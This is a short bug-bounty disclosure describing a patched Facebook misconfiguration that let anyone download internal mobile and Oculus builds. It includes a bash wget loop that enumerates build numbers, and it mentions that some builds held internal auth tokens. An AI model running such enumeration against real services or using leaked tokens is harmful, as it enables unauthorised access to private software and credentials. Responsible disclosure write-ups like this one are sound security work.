Facebook serves mobile apps, modules, firmware and packages via a few utility endpoints. One of these is defined as m.facebook.com/mobile_builds. Via a specific misconfiguration it was possible to use a variation of this URL to download local, profile , in-house and development builds for numerous Facebook, Instagram, Workplace, Portal and Oculus products. The proof of concept sent to Facebook was a simple bash
for i in {183448000..183448100}
do
wget "https://m.facebook.com/mobile_builds/?build_number=$i&no_fw=1" --header='cookie: sb=; datr=; fr=; dpr=2' --content-disposition
done
Changing the range of build numbers allowed one to query for past builds since 2019 or request builds as recent as March 2021. IPAs, APKs, internal Windows and experimental Oculus packages were also found in the dump. A few internal apps also held auth tokens for Facebook’s interngraph.intern.facebook.com endpoint.
Impact (A verbatim explanation of the bounty by Facebook):
This could have let a malicious user access our internal mobile builds.
Timeline
Mar 31, 2021 4:43 pm – Report sent
Mar 31, 2021 6:04 pm – Confirmation of submission by Facebook
“We’ve managed to reproduce your report and will get back to you once we have had a chance to investigate. In the meantime could you please stop further testing on this? As always, we’ll evaluate the full impact of the issue from our side and let you know 🙂“
Mar 31, 2021 6:36 pm – Further investigation of submission by Facebook
Mar 31, 2021 7:31 pm – Confirmation of patch by Facebook
Apr 26, 2021 – $6000 Bounty awarded by Facebook